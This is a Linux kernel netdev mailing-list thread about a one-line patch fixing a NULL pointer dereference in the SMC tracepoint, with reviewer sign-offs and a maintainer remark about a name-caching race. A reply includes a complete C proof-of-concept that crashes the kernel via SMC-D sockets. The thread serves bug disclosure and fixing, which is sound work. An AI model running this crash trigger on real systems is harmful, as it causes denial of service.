* Re: [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint
2026-05-10 22:26 [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint Xiang Mei
@ 2026-05-10 22:50 ` Xiang Mei
2026-05-11 2:11 ` Dust Li
` (3 subsequent siblings)
4 siblings, 0 replies; 8+ messages in thread
From: Xiang Mei @ 2026-05-10 22:50 UTC (permalink / raw)
To: netdev
Cc: alibuda, dust.li, wenjia, sidraya, tonylu, linux-rdma, linux-s390,
bestswngs
Thanks for your attention to this bug. Here are some resources to help
you trigger the bug.
Required configs:
```
CONFIG_SMC=y
CONFIG_DIBS=y
CONFIG_DIBS_LO=y
CONFIG_SMC_DIAG=y
```
Here is a PoC trigger that causes the intended crash shown in the commi message:
```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/mount.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <linux/genetlink.h>
#include <linux/netlink.h>
#define AF_SMC 43
#define PORT 30421
#define SMC_NETLINK_ADD_UEID 10
#define SMC_NETLINK_ENABLE_SEID 14
#define SMC_NLA_EID_TABLE_ENTRY 1
#define SMC_MAX_EID_LEN 32
struct nl_req {
struct nlmsghdr nh;
struct genlmsghdr gh;
char buf[64];
};
static int resolve_smc_family(int fd) {
struct nl_req req = {0};
const char *name = "SMC_GEN_NETLINK";
int name_len = strlen(name) + 1;
req.nh.nlmsg_type = GENL_ID_CTRL;
req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
req.nh.nlmsg_seq = 1;
req.gh.cmd = CTRL_CMD_GETFAMILY;
req.gh.version = 1;
struct nlattr *na = (struct nlattr *)req.buf;
na->nla_type = CTRL_ATTR_FAMILY_NAME;
na->nla_len = NLA_HDRLEN + name_len;
memcpy((char *)na + NLA_HDRLEN, name, name_len);
req.nh.nlmsg_len = NLMSG_HDRLEN + sizeof(req.gh) + NLA_ALIGN(na->nla_len);
send(fd, &req, req.nh.nlmsg_len, 0);
char resp[1024];
int n = recv(fd, resp, sizeof(resp), 0);
if (n < 0) return -1;
struct nlmsghdr *nh = (struct nlmsghdr *)resp;
struct genlmsghdr *gh = NLMSG_DATA(nh);
int len = nh->nlmsg_len - NLMSG_LENGTH(sizeof(*gh));
struct nlattr *attr = (struct nlattr *)((char *)gh + sizeof(*gh));
while (len > 0 && (int)attr->nla_len <= len) {
if (attr->nla_type == CTRL_ATTR_FAMILY_ID)
return *(uint16_t *)((char *)attr + NLA_HDRLEN);
int aligned = NLA_ALIGN(attr->nla_len);
attr = (struct nlattr *)((char *)attr + aligned);
len -= aligned;
}
return -1;
}
static void smc_genl(int fd, int family_id, int cmd, struct nlattr *na) {
struct nl_req req = {0};
req.nh.nlmsg_type = family_id;
req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
req.nh.nlmsg_seq = 2;
req.gh.cmd = cmd;
req.gh.version = 1;
int payload = sizeof(req.gh);
if (na) {
memcpy(req.buf, na, na->nla_len);
payload += NLA_ALIGN(na->nla_len);
}
req.nh.nlmsg_len = NLMSG_HDRLEN + payload;
send(fd, &req, req.nh.nlmsg_len, 0);
char resp[256];
recv(fd, resp, sizeof(resp), 0);
}
static void write_str(const char *path, const char *val) {
int fd = open(path, O_WRONLY);
if (fd < 0) return;
write(fd, val, strlen(val));
close(fd);
}
static void *server_thread(void *arg) {
int srv = socket(AF_SMC, SOCK_STREAM, 0);
int one = 1;
setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
struct sockaddr_in sa = {0};
sa.sin_family = AF_INET;
sa.sin_port = htons(PORT);
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
bind(srv, (struct sockaddr *)&sa, sizeof(sa));
listen(srv, 1);
accept(srv, NULL, NULL);
sleep(5);
return NULL;
}
int main(void) {
mkdir("/sys/kernel/tracing", 0755);
mount("nodev", "/sys/kernel/tracing", "tracefs", 0, NULL);
// Imitate the enviroment with smc_tx_sendmsg enabled
write_str("/sys/kernel/tracing/events/smc/smc_tx_sendmsg/enable", "1");
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
int fid = resolve_smc_family(nl);
smc_genl(nl, fid, SMC_NETLINK_ENABLE_SEID, NULL);
/* ADD_UEID: 32-byte EID padded with spaces, trailing NUL. */
char buf[NLA_HDRLEN + SMC_MAX_EID_LEN + 1] = {0};
struct nlattr *na = (struct nlattr *)buf;
na->nla_type = SMC_NLA_EID_TABLE_ENTRY;
na->nla_len = NLA_HDRLEN + SMC_MAX_EID_LEN + 1;
char *eid = buf + NLA_HDRLEN;
memset(eid, ' ', SMC_MAX_EID_LEN);
memcpy(eid, "TESTUEID", 8);
smc_genl(nl, fid, SMC_NETLINK_ADD_UEID, na);
close(nl);
pthread_t tid;
pthread_create(&tid, NULL, server_thread, NULL);
usleep(500000);
int cli = socket(AF_SMC, SOCK_STREAM, 0);
struct sockaddr_in sa = {0};
sa.sin_family = AF_INET;
sa.sin_port = htons(PORT);
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(cli, (struct sockaddr *)&sa, sizeof(sa));
send(cli, "x", 1, 0); /* trace_smc_tx_sendmsg -> NULL deref via
smc->conn.lnk */
sleep(2);
return 0;
}
```
Feel free to ask for more information.
Thanks,
Xiang
On Sun, May 10, 2026 at 3:26 PM Xiang Mei <xmei5@asu.edu> wrote:
>
> The smc_msg_event tracepoint class, shared by smc_tx_sendmsg and
> smc_rx_recvmsg, unconditionally dereferences smc->conn.lnk:
>
> __string(name, smc->conn.lnk->ibname)
>
> conn->lnk is only set for SMC-R; for SMC-D it is NULL. Other code on
> these paths already handles this (e.g. !conn->lnk in
> SMC_STAT_RMB_TX_SIZE_SMALL()). With the tracepoint enabled, the first
> sendmsg()/recvmsg() on an SMC-D socket crashes:
>
> Oops: general protection fault, probably for non-canonical address
> KASAN: null-ptr-deref in range [...]
> RIP: 0010:strlen+0x1e/0xa0
> Call Trace:
> trace_event_raw_event_smc_msg_event (net/smc/smc_tracepoint.h:44)
> smc_rx_recvmsg (net/smc/smc_rx.c:515)
> smc_recvmsg (net/smc/af_smc.c:2859)
> __sys_recvfrom (net/socket.c:2315)
> __x64_sys_recvfrom (net/socket.c:2326)
> do_syscall_64
>
> The faulting address 0x3e0 is offsetof(struct smc_link, ibname),
> confirming the NULL ->lnk deref. Enabling the tracepoint requires
> root, but the trigger itself is unprivileged: socket(AF_SMC, ...) has
> no capability check, and SMC-D negotiation needs no admin step on
> s390 or on x86 with the loopback ISM device loaded.
>
> Log an empty device name for SMC-D instead of dereferencing NULL.
>
> Fixes: aff3083f10bf ("net/smc: Introduce tracepoints for tx and rx msg")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Assisted-by: Claude:claude-opus-4-7
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
> net/smc/smc_tracepoint.h | 2 +-
> 1 file changed, 1 insertion(+), 1 deletion(-)
>
> diff --git a/net/smc/smc_tracepoint.h b/net/smc/smc_tracepoint.h
> index a9a6e3c1113a..53da84f57fd6 100644
> --- a/net/smc/smc_tracepoint.h
> +++ b/net/smc/smc_tracepoint.h
> @@ -51,7 +51,7 @@ DECLARE_EVENT_CLASS(smc_msg_event,
> __field(const void *, smc)
> __field(u64, net_cookie)
> __field(size_t, len)
> - __string(name, smc->conn.lnk->ibname)
> + __string(name, smc->conn.lnk ? smc->conn.lnk->ibname : "")
> ),
>
> TP_fast_assign(
> --
> 2.43.0
>
^ permalink raw reply [flat|nested] 8+ messages in thread* Re: [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint
2026-05-10 22:26 [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint Xiang Mei
2026-05-10 22:50 ` Xiang Mei
@ 2026-05-11 2:11 ` Dust Li
2026-05-11 5:06 ` Sidraya Jayagond
` (2 subsequent siblings)
4 siblings, 0 replies; 8+ messages in thread
From: Dust Li @ 2026-05-11 2:11 UTC (permalink / raw)
To: Xiang Mei, netdev
Cc: alibuda, wenjia, sidraya, tonylu, linux-rdma, linux-s390,
bestswngs
On 2026-05-10 15:26:40, Xiang Mei wrote:
>The smc_msg_event tracepoint class, shared by smc_tx_sendmsg and
>smc_rx_recvmsg, unconditionally dereferences smc->conn.lnk:
>
> __string(name, smc->conn.lnk->ibname)
>
>conn->lnk is only set for SMC-R; for SMC-D it is NULL. Other code on
>these paths already handles this (e.g. !conn->lnk in
>SMC_STAT_RMB_TX_SIZE_SMALL()). With the tracepoint enabled, the first
>sendmsg()/recvmsg() on an SMC-D socket crashes:
>
> Oops: general protection fault, probably for non-canonical address
> KASAN: null-ptr-deref in range [...]
> RIP: 0010:strlen+0x1e/0xa0
> Call Trace:
> trace_event_raw_event_smc_msg_event (net/smc/smc_tracepoint.h:44)
> smc_rx_recvmsg (net/smc/smc_rx.c:515)
> smc_recvmsg (net/smc/af_smc.c:2859)
> __sys_recvfrom (net/socket.c:2315)
> __x64_sys_recvfrom (net/socket.c:2326)
> do_syscall_64
>
>The faulting address 0x3e0 is offsetof(struct smc_link, ibname),
>confirming the NULL ->lnk deref. Enabling the tracepoint requires
>root, but the trigger itself is unprivileged: socket(AF_SMC, ...) has
>no capability check, and SMC-D negotiation needs no admin step on
>s390 or on x86 with the loopback ISM device loaded.
>
>Log an empty device name for SMC-D instead of dereferencing NULL.
>
>Fixes: aff3083f10bf ("net/smc: Introduce tracepoints for tx and rx msg")
>Reported-by: Weiming Shi <bestswngs@gmail.com>
>Assisted-by: Claude:claude-opus-4-7
>Signed-off-by: Xiang Mei <xmei5@asu.edu>
Reviewed-by: Dust Li <dust.li@linux.alibaba.com>
Best regards,
Dust
^ permalink raw reply [flat|nested] 8+ messages in thread* Re: [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint
2026-05-10 22:26 [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint Xiang Mei
2026-05-10 22:50 ` Xiang Mei
2026-05-11 2:11 ` Dust Li
@ 2026-05-11 5:06 ` Sidraya Jayagond
2026-05-13 3:45 ` patchwork-bot+netdevbpf
2026-05-17 8:45 ` Leon Romanovsky
4 siblings, 0 replies; 8+ messages in thread
From: Sidraya Jayagond @ 2026-05-11 5:06 UTC (permalink / raw)
To: Xiang Mei, netdev
Cc: alibuda, dust.li, wenjia, tonylu, linux-rdma, linux-s390,
bestswngs
On 11/05/26 3:56 am, Xiang Mei wrote:
> The smc_msg_event tracepoint class, shared by smc_tx_sendmsg and
> smc_rx_recvmsg, unconditionally dereferences smc->conn.lnk:
>
> __string(name, smc->conn.lnk->ibname)
>
> conn->lnk is only set for SMC-R; for SMC-D it is NULL. Other code on
> these paths already handles this (e.g. !conn->lnk in
> SMC_STAT_RMB_TX_SIZE_SMALL()). With the tracepoint enabled, the first
> sendmsg()/recvmsg() on an SMC-D socket crashes:
>
> Oops: general protection fault, probably for non-canonical address
> KASAN: null-ptr-deref in range [...]
> RIP: 0010:strlen+0x1e/0xa0
> Call Trace:
> trace_event_raw_event_smc_msg_event (net/smc/smc_tracepoint.h:44)
> smc_rx_recvmsg (net/smc/smc_rx.c:515)
> smc_recvmsg (net/smc/af_smc.c:2859)
> __sys_recvfrom (net/socket.c:2315)
> __x64_sys_recvfrom (net/socket.c:2326)
> do_syscall_64
>
> The faulting address 0x3e0 is offsetof(struct smc_link, ibname),
> confirming the NULL ->lnk deref. Enabling the tracepoint requires
> root, but the trigger itself is unprivileged: socket(AF_SMC, ...) has
> no capability check, and SMC-D negotiation needs no admin step on
> s390 or on x86 with the loopback ISM device loaded.
>
> Log an empty device name for SMC-D instead of dereferencing NULL.
>
> Fixes: aff3083f10bf ("net/smc: Introduce tracepoints for tx and rx msg")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Assisted-by: Claude:claude-opus-4-7
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
> net/smc/smc_tracepoint.h | 2 +-
> 1 file changed, 1 insertion(+), 1 deletion(-)
>
> diff --git a/net/smc/smc_tracepoint.h b/net/smc/smc_tracepoint.h
> index a9a6e3c1113a..53da84f57fd6 100644
> --- a/net/smc/smc_tracepoint.h
> +++ b/net/smc/smc_tracepoint.h
> @@ -51,7 +51,7 @@ DECLARE_EVENT_CLASS(smc_msg_event,
> __field(const void *, smc)
> __field(u64, net_cookie)
> __field(size_t, len)
> - __string(name, smc->conn.lnk->ibname)
> + __string(name, smc->conn.lnk ? smc->conn.lnk->ibname : "")
> ),
>
> TP_fast_assign(
Reviewed-by: Sidraya Jayagond <sidraya@linux.ibm.com>
^ permalink raw reply [flat|nested] 8+ messages in thread* Re: [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint
2026-05-10 22:26 [PATCH net] net/smc: avoid NULL deref of conn->lnk in smc_msg_event tracepoint Xiang Mei
` (3 preceding siblings ...)
2026-05-13 3:45 ` patchwork-bot+netdevbpf
@ 2026-05-17 8:45 ` Leon Romanovsky
2026-05-17 15:08 ` Dust Li
4 siblings, 1 reply; 8+ messages in thread
From: Leon Romanovsky @ 2026-05-17 8:45 UTC (permalink / raw)
To: Xiang Mei, alibuda
Cc: netdev, dust.li, wenjia, sidraya, tonylu, linux-rdma, linux-s390,
bestswngs
On Sun, May 10, 2026 at 03:26:40PM -0700, Xiang Mei wrote:
> The smc_msg_event tracepoint class, shared by smc_tx_sendmsg and
> smc_rx_recvmsg, unconditionally dereferences smc->conn.lnk:
>
> __string(name, smc->conn.lnk->ibname)
My comment is not directly related to this patch, but it was triggered
while reviewing it. The ibname should not be cached, as users can rename
it through rdmatool or udev.
For example, this function is racy:
552 static int smc_nl_handle_smcr_dev(struct smc_ib_device *smcibdev,
553 struct sk_buff *skb,
554 struct netlink_callback *cb)
555 {
...
582 snprintf(smc_ibname, sizeof(smc_ibname), "%s", smcibdev->ibdev->name);
Thanks
^ permalink raw reply [flat|nested] 8+ messages in thread